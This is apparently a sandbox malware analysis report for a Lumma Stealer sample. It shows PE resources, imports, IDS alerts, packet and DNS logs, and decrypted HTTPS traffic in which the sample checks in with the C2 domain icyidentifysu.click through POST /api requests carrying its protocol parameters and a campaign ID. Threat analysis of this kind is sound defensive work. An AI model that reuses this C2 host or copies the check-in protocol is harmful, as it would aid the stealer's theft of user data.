RT_ICON	0xe2d864	0x1628	Device independent bitmap graphic, 64 x 128 x 8, image size 4096, 256 important colors	English	United States	0.08339210155148095
RT_ICON	0xe2ee8c	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	English	United States	0.1023454157782516
RT_ICON	0xe2fd34	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	English	United States	0.10649819494584838
RT_ICON	0xe305dc	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	English	United States	0.10838150289017341
RT_ICON	0xe30b44	0x12e5	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	United States	0.8712011577424024
RT_ICON	0xe31e2c	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 16896	English	United States	0.05668398677373642
RT_ICON	0xe36054	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	English	United States	0.08475103734439834
RT_ICON	0xe385fc	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	English	United States	0.09920262664165103
RT_ICON	0xe396a4	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	United States	0.2047872340425532
RT_GROUP_ICON	0xe39b0c	0xbc	data	English	United States	0.6170212765957447
RT_VERSION	0xe39bc8	0x584	data	English	United States	0.25920679886685555
RT_MANIFEST	0xe3a14c	0x7a8	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.3377551020408163

Imports

DLL

Import

kernel32.dll

WriteFile, WriteConsoleW, WaitForMultipleObjects, WaitForSingleObject, VirtualQuery, VirtualFree, VirtualAlloc, SwitchToThread, SuspendThread, SetWaitableTimer, SetUnhandledExceptionFilter, SetProcessPriorityBoost, SetEvent, SetErrorMode, SetConsoleCtrlHandler, ResumeThread, PostQueuedCompletionStatus, LoadLibraryA, LoadLibraryW, SetThreadContext, GetThreadContext, GetSystemInfo, GetSystemDirectoryA, GetStdHandle, GetQueuedCompletionStatusEx, GetProcessAffinityMask, GetProcAddress, GetEnvironmentStringsW, GetConsoleMode, FreeEnvironmentStringsW, ExitProcess, DuplicateHandle, CreateWaitableTimerExW, CreateThread, CreateIoCompletionPort, CreateFileA, CreateEventA, CloseHandle, AddVectoredExceptionHandler

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-27T23:58:30.970877+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49736	104.21.29.252	443	TCP
2024-12-27T23:58:31.719182+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49736	104.21.29.252	443	TCP
2024-12-27T23:58:31.719182+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49736	104.21.29.252	443	TCP
2024-12-27T23:58:33.073651+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49737	104.21.29.252	443	TCP
2024-12-27T23:58:33.855939+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.4	49737	104.21.29.252	443	TCP
2024-12-27T23:58:33.855939+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49737	104.21.29.252	443	TCP
2024-12-27T23:58:35.521088+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49738	104.21.29.252	443	TCP
2024-12-27T23:58:38.001002+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49739	104.21.29.252	443	TCP
2024-12-27T23:58:38.767654+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.4	49739	104.21.29.252	443	TCP
2024-12-27T23:58:40.206896+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49740	104.21.29.252	443	TCP
2024-12-27T23:58:42.907688+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49741	104.21.29.252	443	TCP
2024-12-27T23:58:45.419662+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49742	104.21.29.252	443	TCP
2024-12-27T23:58:45.443933+0100	2843864	ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2	1	192.168.2.4	49742	104.21.29.252	443	TCP
2024-12-27T23:58:49.347650+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49743	104.21.29.252	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 27, 2024 23:58:29.684747934 CET	49736	443	192.168.2.4	104.21.29.252
Dec 27, 2024 23:58:29.684808016 CET	443	49736	104.21.29.252	192.168.2.4
Dec 27, 2024 23:58:29.684938908 CET	49736	443	192.168.2.4	104.21.29.252
Dec 27, 2024 23:58:29.688107967 CET	49736	443	192.168.2.4	104.21.29.252
Dec 27, 2024 23:58:29.688133001 CET	443	49736	104.21.29.252	192.168.2.4
Dec 27, 2024 23:58:30.970784903 CET	443	49736	104.21.29.252	192.168.2.4
Dec 27, 2024 23:58:30.970876932 CET	49736	443	192.168.2.4	104.21.29.252
Dec 27, 2024 23:58:30.976115942 CET	49736	443	192.168.2.4	104.21.29.252
Dec 27, 2024 23:58:30.976164103 CET	443	49736	104.21.29.252	192.168.2.4
Dec 27, 2024 23:58:30.976401091 CET	443	49736	104.21.29.252	192.168.2.4
Dec 27, 2024 23:58:31.019275904 CET	49736	443	192.168.2.4	104.21.29.252
Dec 27, 2024 23:58:31.021533012 CET	49736	443	192.168.2.4	104.21.29.252
Dec 27, 2024 23:58:31.021568060 CET	49736	443	192.168.2.4	104.21.29.252
Dec 27, 2024 23:58:31.021637917 CET	443	49736	104.21.29.252	192.168.2.4
Dec 27, 2024 23:58:31.719178915 CET	443	49736	104.21.29.252	192.168.2.4
Dec 27, 2024 23:58:31.719516039 CET	443	49736	104.21.29.252	192.168.2.4
Dec 27, 2024 23:58:31.719620943 CET	49736	443	192.168.2.4	104.21.29.252
Dec 27, 2024 23:58:31.797540903 CET	49736	443	192.168.2.4	104.21.29.252
Dec 27, 2024 23:58:31.797595024 CET	443	49736	104.21.29.252	192.168.2.4
Dec 27, 2024 23:58:31.851977110 CET	49737	443	192.168.2.4	104.21.29.252
Dec 27, 2024 23:58:31.852026939 CET	443	49737	104.21.29.252	192.168.2.4
Dec 27, 2024 23:58:31.852088928 CET	49737	443	192.168.2.4	104.21.29.252
Dec 27, 2024 23:58:31.853811026 CET	49737	443	192.168.2.4	104.21.29.252
Dec 27, 2024 23:58:31.853825092 CET	443	49737	104.21.29.252	192.168.2.4
Dec 27, 2024 23:58:33.073559046 CET	443	49737	104.21.29.252	192.168.2.4
Dec 27, 2024 23:58:33.073651075 CET	49737	443	192.168.2.4	104.21.29.252
Dec 27, 2024 23:58:33.075054884 CET	49737	443	192.168.2.4	104.21.29.252
Dec 27, 2024 23:58:33.075063944 CET	443	49737	104.21.29.252	192.168.2.4
Dec 27, 2024 23:58:33.075262070 CET	443	49737	104.21.29.252	192.168.2.4
Dec 27, 2024 23:58:33.084285975 CET	49737	443	192.168.2.4	104.21.29.252
Dec 27, 2024 23:58:33.084372997 CET	49737	443	192.168.2.4	104.21.29.252
Dec 27, 2024 23:58:33.084400892 CET	443	49737	104.21.29.252	192.168.2.4
Dec 27, 2024 23:58:33.855952978 CET	443	49737	104.21.29.252	192.168.2.4
Dec 27, 2024 23:58:33.856000900 CET	443	49737	104.21.29.252	192.168.2.4
Dec 27, 2024 23:58:33.856029034 CET	443	49737	104.21.29.252	192.168.2.4
Dec 27, 2024 23:58:33.856045961 CET	49737	443	192.168.2.4	104.21.29.252
Dec 27, 2024 23:58:33.856067896 CET	443	49737	104.21.29.252	192.168.2.4
Dec 27, 2024 23:58:33.856103897 CET	49737	443	192.168.2.4	104.21.29.252
Dec 27, 2024 23:58:33.856189966 CET	443	49737	104.21.29.252	192.168.2.4
Dec 27, 2024 23:58:33.865741014 CET	443	49737	104.21.29.252	192.168.2.4
Dec 27, 2024 23:58:33.865808964 CET	49737	443	192.168.2.4	104.21.29.252
Dec 27, 2024 23:58:33.865814924 CET	443	49737	104.21.29.252	192.168.2.4
Dec 27, 2024 23:58:33.874460936 CET	443	49737	104.21.29.252	192.168.2.4
Dec 27, 2024 23:58:33.874507904 CET	49737	443	192.168.2.4	104.21.29.252
Dec 27, 2024 23:58:33.874514103 CET	443	49737	104.21.29.252	192.168.2.4
Dec 27, 2024 23:58:33.925499916 CET	49737	443	192.168.2.4	104.21.29.252
Dec 27, 2024 23:58:33.925506115 CET	443	49737	104.21.29.252	192.168.2.4
Dec 27, 2024 23:58:33.972378016 CET	49737	443	192.168.2.4	104.21.29.252
Dec 27, 2024 23:58:33.975451946 CET	443	49737	104.21.29.252	192.168.2.4
Dec 27, 2024 23:58:33.979614973 CET	443	49737	104.21.29.252	192.168.2.4
Dec 27, 2024 23:58:33.979664087 CET	49737	443	192.168.2.4	104.21.29.252
Dec 27, 2024 23:58:33.979671001 CET	443	49737	104.21.29.252	192.168.2.4
Dec 27, 2024 23:58:34.019263983 CET	49737	443	192.168.2.4	104.21.29.252
Dec 27, 2024 23:58:34.050779104 CET	443	49737	104.21.29.252	192.168.2.4
Dec 27, 2024 23:58:34.054789066 CET	443	49737	104.21.29.252	192.168.2.4
Dec 27, 2024 23:58:34.054881096 CET	443	49737	104.21.29.252	192.168.2.4
Dec 27, 2024 23:58:34.054948092 CET	49737	443	192.168.2.4	104.21.29.252
Dec 27, 2024 23:58:34.054948092 CET	49737	443	192.168.2.4	104.21.29.252
Dec 27, 2024 23:58:34.055020094 CET	49737	443	192.168.2.4	104.21.29.252
Dec 27, 2024 23:58:34.055039883 CET	443	49737	104.21.29.252	192.168.2.4
Dec 27, 2024 23:58:34.055073977 CET	49737	443	192.168.2.4	104.21.29.252
Dec 27, 2024 23:58:34.055082083 CET	443	49737	104.21.29.252	192.168.2.4
Dec 27, 2024 23:58:34.263430119 CET	49738	443	192.168.2.4	104.21.29.252
Dec 27, 2024 23:58:34.263508081 CET	443	49738	104.21.29.252	192.168.2.4
Dec 27, 2024 23:58:34.263612032 CET	49738	443	192.168.2.4	104.21.29.252
Dec 27, 2024 23:58:34.263931990 CET	49738	443	192.168.2.4	104.21.29.252
Dec 27, 2024 23:58:34.263971090 CET	443	49738	104.21.29.252	192.168.2.4
Dec 27, 2024 23:58:35.520894051 CET	443	49738	104.21.29.252	192.168.2.4
Dec 27, 2024 23:58:35.521087885 CET	49738	443	192.168.2.4	104.21.29.252
Dec 27, 2024 23:58:35.522418022 CET	49738	443	192.168.2.4	104.21.29.252
Dec 27, 2024 23:58:35.522461891 CET	443	49738	104.21.29.252	192.168.2.4
Dec 27, 2024 23:58:35.522716045 CET	443	49738	104.21.29.252	192.168.2.4
Dec 27, 2024 23:58:35.523911953 CET	49738	443	192.168.2.4	104.21.29.252
Dec 27, 2024 23:58:35.524066925 CET	49738	443	192.168.2.4	104.21.29.252
Dec 27, 2024 23:58:35.524115086 CET	443	49738	104.21.29.252	192.168.2.4
Dec 27, 2024 23:58:35.524183989 CET	49738	443	192.168.2.4	104.21.29.252
Dec 27, 2024 23:58:35.524198055 CET	443	49738	104.21.29.252	192.168.2.4
Dec 27, 2024 23:58:36.627702951 CET	443	49738	104.21.29.252	192.168.2.4
Dec 27, 2024 23:58:36.627791882 CET	443	49738	104.21.29.252	192.168.2.4
Dec 27, 2024 23:58:36.627865076 CET	49738	443	192.168.2.4	104.21.29.252
Dec 27, 2024 23:58:36.628117085 CET	49738	443	192.168.2.4	104.21.29.252
Dec 27, 2024 23:58:36.628144026 CET	443	49738	104.21.29.252	192.168.2.4
Dec 27, 2024 23:58:36.727608919 CET	49739	443	192.168.2.4	104.21.29.252
Dec 27, 2024 23:58:36.727658987 CET	443	49739	104.21.29.252	192.168.2.4
Dec 27, 2024 23:58:36.727737904 CET	49739	443	192.168.2.4	104.21.29.252
Dec 27, 2024 23:58:36.728013039 CET	49739	443	192.168.2.4	104.21.29.252
Dec 27, 2024 23:58:36.728027105 CET	443	49739	104.21.29.252	192.168.2.4
Dec 27, 2024 23:58:38.000766993 CET	443	49739	104.21.29.252	192.168.2.4
Dec 27, 2024 23:58:38.001002073 CET	49739	443	192.168.2.4	104.21.29.252
Dec 27, 2024 23:58:38.002310991 CET	49739	443	192.168.2.4	104.21.29.252
Dec 27, 2024 23:58:38.002320051 CET	443	49739	104.21.29.252	192.168.2.4
Dec 27, 2024 23:58:38.002547979 CET	443	49739	104.21.29.252	192.168.2.4
Dec 27, 2024 23:58:38.004020929 CET	49739	443	192.168.2.4	104.21.29.252
Dec 27, 2024 23:58:38.004139900 CET	49739	443	192.168.2.4	104.21.29.252
Dec 27, 2024 23:58:38.004163980 CET	443	49739	104.21.29.252	192.168.2.4
Dec 27, 2024 23:58:38.767667055 CET	443	49739	104.21.29.252	192.168.2.4
Dec 27, 2024 23:58:38.767752886 CET	443	49739	104.21.29.252	192.168.2.4
Dec 27, 2024 23:58:38.767857075 CET	49739	443	192.168.2.4	104.21.29.252
Dec 27, 2024 23:58:38.768131971 CET	49739	443	192.168.2.4	104.21.29.252
Dec 27, 2024 23:58:38.768150091 CET	443	49739	104.21.29.252	192.168.2.4
Dec 27, 2024 23:58:38.946624994 CET	49740	443	192.168.2.4	104.21.29.252
Dec 27, 2024 23:58:38.946744919 CET	443	49740	104.21.29.252	192.168.2.4
Dec 27, 2024 23:58:38.946830034 CET	49740	443	192.168.2.4	104.21.29.252
Dec 27, 2024 23:58:38.947165966 CET	49740	443	192.168.2.4	104.21.29.252
Dec 27, 2024 23:58:38.947202921 CET	443	49740	104.21.29.252	192.168.2.4
Dec 27, 2024 23:58:40.206715107 CET	443	49740	104.21.29.252	192.168.2.4
Dec 27, 2024 23:58:40.206896067 CET	49740	443	192.168.2.4	104.21.29.252
Dec 27, 2024 23:58:40.208288908 CET	49740	443	192.168.2.4	104.21.29.252
Dec 27, 2024 23:58:40.208322048 CET	443	49740	104.21.29.252	192.168.2.4
Dec 27, 2024 23:58:40.208580017 CET	443	49740	104.21.29.252	192.168.2.4
Dec 27, 2024 23:58:40.209924936 CET	49740	443	192.168.2.4	104.21.29.252
Dec 27, 2024 23:58:40.210166931 CET	49740	443	192.168.2.4	104.21.29.252
Dec 27, 2024 23:58:40.210205078 CET	443	49740	104.21.29.252	192.168.2.4
Dec 27, 2024 23:58:40.210273027 CET	49740	443	192.168.2.4	104.21.29.252
Dec 27, 2024 23:58:40.210288048 CET	443	49740	104.21.29.252	192.168.2.4
Dec 27, 2024 23:58:41.178008080 CET	443	49740	104.21.29.252	192.168.2.4
Dec 27, 2024 23:58:41.178111076 CET	443	49740	104.21.29.252	192.168.2.4
Dec 27, 2024 23:58:41.178174973 CET	49740	443	192.168.2.4	104.21.29.252
Dec 27, 2024 23:58:41.178610086 CET	49740	443	192.168.2.4	104.21.29.252
Dec 27, 2024 23:58:41.178651094 CET	443	49740	104.21.29.252	192.168.2.4
Dec 27, 2024 23:58:41.647339106 CET	49741	443	192.168.2.4	104.21.29.252
Dec 27, 2024 23:58:41.647454977 CET	443	49741	104.21.29.252	192.168.2.4
Dec 27, 2024 23:58:41.647569895 CET	49741	443	192.168.2.4	104.21.29.252
Dec 27, 2024 23:58:41.647851944 CET	49741	443	192.168.2.4	104.21.29.252
Dec 27, 2024 23:58:41.647906065 CET	443	49741	104.21.29.252	192.168.2.4
Dec 27, 2024 23:58:42.907607079 CET	443	49741	104.21.29.252	192.168.2.4
Dec 27, 2024 23:58:42.907687902 CET	49741	443	192.168.2.4	104.21.29.252
Dec 27, 2024 23:58:42.908893108 CET	49741	443	192.168.2.4	104.21.29.252
Dec 27, 2024 23:58:42.908910036 CET	443	49741	104.21.29.252	192.168.2.4
Dec 27, 2024 23:58:42.909122944 CET	443	49741	104.21.29.252	192.168.2.4
Dec 27, 2024 23:58:42.910346031 CET	49741	443	192.168.2.4	104.21.29.252
Dec 27, 2024 23:58:42.910438061 CET	49741	443	192.168.2.4	104.21.29.252
Dec 27, 2024 23:58:42.910444021 CET	443	49741	104.21.29.252	192.168.2.4
Dec 27, 2024 23:58:43.700736046 CET	443	49741	104.21.29.252	192.168.2.4
Dec 27, 2024 23:58:43.700823069 CET	443	49741	104.21.29.252	192.168.2.4
Dec 27, 2024 23:58:43.700880051 CET	49741	443	192.168.2.4	104.21.29.252
Dec 27, 2024 23:58:43.701085091 CET	49741	443	192.168.2.4	104.21.29.252
Dec 27, 2024 23:58:43.701107025 CET	443	49741	104.21.29.252	192.168.2.4
Dec 27, 2024 23:58:44.155591011 CET	49742	443	192.168.2.4	104.21.29.252
Dec 27, 2024 23:58:44.155651093 CET	443	49742	104.21.29.252	192.168.2.4
Dec 27, 2024 23:58:44.155734062 CET	49742	443	192.168.2.4	104.21.29.252
Dec 27, 2024 23:58:44.156172037 CET	49742	443	192.168.2.4	104.21.29.252
Dec 27, 2024 23:58:44.156183004 CET	443	49742	104.21.29.252	192.168.2.4
Dec 27, 2024 23:58:45.419437885 CET	443	49742	104.21.29.252	192.168.2.4
Dec 27, 2024 23:58:45.419661999 CET	49742	443	192.168.2.4	104.21.29.252
Dec 27, 2024 23:58:45.420897961 CET	49742	443	192.168.2.4	104.21.29.252
Dec 27, 2024 23:58:45.420928955 CET	443	49742	104.21.29.252	192.168.2.4
Dec 27, 2024 23:58:45.421186924 CET	443	49742	104.21.29.252	192.168.2.4
Dec 27, 2024 23:58:45.442568064 CET	49742	443	192.168.2.4	104.21.29.252
Dec 27, 2024 23:58:45.443383932 CET	49742	443	192.168.2.4	104.21.29.252
Dec 27, 2024 23:58:45.443428040 CET	443	49742	104.21.29.252	192.168.2.4
Dec 27, 2024 23:58:45.443542004 CET	49742	443	192.168.2.4	104.21.29.252
Dec 27, 2024 23:58:45.443582058 CET	443	49742	104.21.29.252	192.168.2.4
Dec 27, 2024 23:58:45.443725109 CET	49742	443	192.168.2.4	104.21.29.252
Dec 27, 2024 23:58:45.443777084 CET	443	49742	104.21.29.252	192.168.2.4
Dec 27, 2024 23:58:45.444174051 CET	49742	443	192.168.2.4	104.21.29.252
Dec 27, 2024 23:58:45.444222927 CET	443	49742	104.21.29.252	192.168.2.4
Dec 27, 2024 23:58:45.444447041 CET	49742	443	192.168.2.4	104.21.29.252
Dec 27, 2024 23:58:45.444497108 CET	443	49742	104.21.29.252	192.168.2.4
Dec 27, 2024 23:58:45.444685936 CET	49742	443	192.168.2.4	104.21.29.252
Dec 27, 2024 23:58:45.444719076 CET	443	49742	104.21.29.252	192.168.2.4
Dec 27, 2024 23:58:45.444742918 CET	49742	443	192.168.2.4	104.21.29.252
Dec 27, 2024 23:58:45.444771051 CET	443	49742	104.21.29.252	192.168.2.4
Dec 27, 2024 23:58:45.444967985 CET	49742	443	192.168.2.4	104.21.29.252
Dec 27, 2024 23:58:45.445004940 CET	443	49742	104.21.29.252	192.168.2.4
Dec 27, 2024 23:58:45.445053101 CET	49742	443	192.168.2.4	104.21.29.252
Dec 27, 2024 23:58:45.445123911 CET	49742	443	192.168.2.4	104.21.29.252
Dec 27, 2024 23:58:45.445168018 CET	49742	443	192.168.2.4	104.21.29.252
Dec 27, 2024 23:58:45.491322994 CET	443	49742	104.21.29.252	192.168.2.4
Dec 27, 2024 23:58:45.491503954 CET	49742	443	192.168.2.4	104.21.29.252
Dec 27, 2024 23:58:45.491532087 CET	443	49742	104.21.29.252	192.168.2.4
Dec 27, 2024 23:58:45.491554976 CET	49742	443	192.168.2.4	104.21.29.252
Dec 27, 2024 23:58:45.491574049 CET	443	49742	104.21.29.252	192.168.2.4
Dec 27, 2024 23:58:45.491591930 CET	49742	443	192.168.2.4	104.21.29.252
Dec 27, 2024 23:58:45.491602898 CET	443	49742	104.21.29.252	192.168.2.4
Dec 27, 2024 23:58:45.491614103 CET	49742	443	192.168.2.4	104.21.29.252
Dec 27, 2024 23:58:45.491616964 CET	443	49742	104.21.29.252	192.168.2.4
Dec 27, 2024 23:58:45.491636038 CET	49742	443	192.168.2.4	104.21.29.252
Dec 27, 2024 23:58:45.491646051 CET	443	49742	104.21.29.252	192.168.2.4
Dec 27, 2024 23:58:48.703711033 CET	443	49742	104.21.29.252	192.168.2.4
Dec 27, 2024 23:58:48.703807116 CET	443	49742	104.21.29.252	192.168.2.4
Dec 27, 2024 23:58:48.703910112 CET	49742	443	192.168.2.4	104.21.29.252
Dec 27, 2024 23:58:48.725321054 CET	49742	443	192.168.2.4	104.21.29.252
Dec 27, 2024 23:58:48.725356102 CET	443	49742	104.21.29.252	192.168.2.4
Dec 27, 2024 23:58:48.936058998 CET	49743	443	192.168.2.4	104.21.29.252
Dec 27, 2024 23:58:48.936117887 CET	443	49743	104.21.29.252	192.168.2.4
Dec 27, 2024 23:58:48.936177015 CET	49743	443	192.168.2.4	104.21.29.252
Dec 27, 2024 23:58:48.936842918 CET	49743	443	192.168.2.4	104.21.29.252
Dec 27, 2024 23:58:48.936857939 CET	443	49743	104.21.29.252	192.168.2.4
Dec 27, 2024 23:58:49.347650051 CET	49743	443	192.168.2.4	104.21.29.252

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 27, 2024 23:58:29.366528988 CET	50316	53	192.168.2.4	1.1.1.1
Dec 27, 2024 23:58:29.678163052 CET	53	50316	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 27, 2024 23:58:29.366528988 CET	192.168.2.4	1.1.1.1	0x6737	Standard query (0)	icyidentifysu.click	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 27, 2024 23:58:29.678163052 CET	1.1.1.1	192.168.2.4	0x6737	No error (0)	icyidentifysu.click		104.21.29.252	A (IP address)	IN (0x0001)	false
Dec 27, 2024 23:58:29.678163052 CET	1.1.1.1	192.168.2.4	0x6737	No error (0)	icyidentifysu.click		172.67.150.24	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

icyidentifysu.click

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49736	104.21.29.252	443	7120	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-27 22:58:31 UTC	266	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: icyidentifysu.click
2024-12-27 22:58:31 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-12-27 22:58:31 UTC	1135	IN	HTTP/1.1 200 OK Date: Fri, 27 Dec 2024 22:58:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=guen83rl4jo1tskfr6dula55qj; expires=Tue, 22 Apr 2025 16:45:10 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ybM2IVqT1ghUQWxsMszkTK%2FGji745u27R2cnhfGrn0lcuim4ZLavZNE%2Fv0pYfzZCIeo1IjpXC%2FtV7cel%2BxEJIvF2RXMhsVfilcv8GxS%2FZ%2F2lgXVhBSwPWX%2FI7xNvkrPFXuV4NsI9"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f8cea714cbe437a-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=10786&min_rtt=2093&rtt_var=6136&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2851&recv_bytes=910&delivery_rate=1395126&cwnd=223&unsent_bytes=0&cid=9e367062a0bde8f1&ts=759&x=0"
2024-12-27 22:58:31 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-12-27 22:58:31 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49737	104.21.29.252	443	7120	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-27 22:58:33 UTC	267	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 54 Host: icyidentifysu.click
2024-12-27 22:58:33 UTC	54	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 50 6e 68 71 6f 2d 2d 62 6b 74 67 74 70 71 76 73 6f 75 61 26 6a 3d Data Ascii: act=recive_message&ver=4.0&lid=LPnhqo--bktgtpqvsoua&j=
2024-12-27 22:58:33 UTC	1124	IN	HTTP/1.1 200 OK Date: Fri, 27 Dec 2024 22:58:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=4a1fkoqca1rjnapv6tq59o0tto; expires=Tue, 22 Apr 2025 16:45:12 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EvoJ6G4IxbXR6UHXMp9QpyuerPLpmXMG1oDJUF9zckU9SYtjBxM%2BRDImMVYnMgrIdarHxHx1VpwIgK%2BRj2Szcdl2RlIlwjuYkcW0l68amE5wr5mAKtzjR9bVtC5ithlUGJpIYX%2FE"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f8cea7e7f81424d-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1584&min_rtt=1584&rtt_var=792&sent=6&recv=7&lost=0&retrans=1&sent_bytes=4242&recv_bytes=957&delivery_rate=353939&cwnd=208&unsent_bytes=0&cid=edacee52d9efe482&ts=796&x=0"
2024-12-27 22:58:33 UTC	245	IN	Data Raw: 31 34 38 37 0d 0a 7a 4d 4f 7a 4f 73 44 65 42 4a 70 6d 66 31 75 51 48 33 43 37 52 33 38 4d 71 38 54 6c 45 58 4c 77 4f 49 62 69 61 41 2f 54 75 62 2b 33 34 63 55 59 2b 75 6f 6f 75 42 55 61 65 61 70 72 41 73 34 69 55 79 37 4b 6f 4d 63 72 46 4a 46 55 39 59 64 45 4c 61 58 55 6e 66 61 6c 30 6c 61 7a 75 79 69 34 41 77 64 35 71 6b 51 4c 6d 53 49 52 4c 70 48 6d 67 48 73 51 6b 56 54 6b 67 77 4e 67 6f 39 58 63 70 4b 2f 55 55 71 57 39 59 50 73 4b 45 6a 37 31 65 68 48 52 4b 52 5a 68 77 36 6e 48 50 56 43 56 51 71 54 59 53 6b 4b 32 7a 64 36 42 6f 73 42 52 34 71 4d 6f 34 55 51 61 4e 62 49 6c 55 74 6f 69 48 57 44 4e 6f 49 35 35 47 70 68 63 35 59 59 43 66 37 72 66 31 36 53 68 31 31 4f 76 74 48 54 32 41 42 55 31 38 33 41 52 6d 57 74 64 61 64 48 Data Ascii: 1487zMOzOsDeBJpmf1uQH3C7R38Mq8TlEXLwOIbiaA/Tub+34cUY+uoouBUaeaprAs4iUy7KoMcrFJFU9YdELaXUnfal0lazuyi4Awd5qkQLmSIRLpHmgHsQkVTkgwNgo9XcpK/UUqW9YPsKEj71ehHRKRZhw6nHPVCVQqTYSkK2zd6BosBR4qMo4UQaNbIlUtoiHWDNoI55Gphc5YYCf7rf16Sh11OvtHT2ABU183ARmWtdadH
